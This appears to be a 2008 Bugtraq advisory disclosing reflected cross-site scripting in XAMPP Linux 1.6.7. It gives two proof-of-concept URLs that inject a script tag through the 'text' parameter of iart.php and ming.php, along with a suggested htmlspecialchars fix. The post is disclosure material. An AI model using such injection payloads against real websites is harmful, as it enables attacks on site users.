Bugtraq mailing list archives
Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
From: irancrash () gmail com
Date: Mon, 4 Aug 2008 08:13:04 -0600
---------------------------------------------------------------- Program : Xampp Linux 1.6.7 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium ---------------------------------------------------------------- Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Cross Site Scripting Vulnerabilities : Vulnerability work when register_globals set as on . http://Example.com/xampp/iart.php?text=";>><<>>"''<script>alert(document.alert)</script> http://Example.com/xampp/ming.php?text=";>><<>>"''<script>alert(document.alert)</script> Solution : Remove xampp folder or filter text variable with htmlspecialchars() function .... ---------------------------------------------------------------- Tnx : God HTTP://IRCRASH.COM ----------------------------------------------------------------
Current thread:
- Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities irancrash (Aug 04)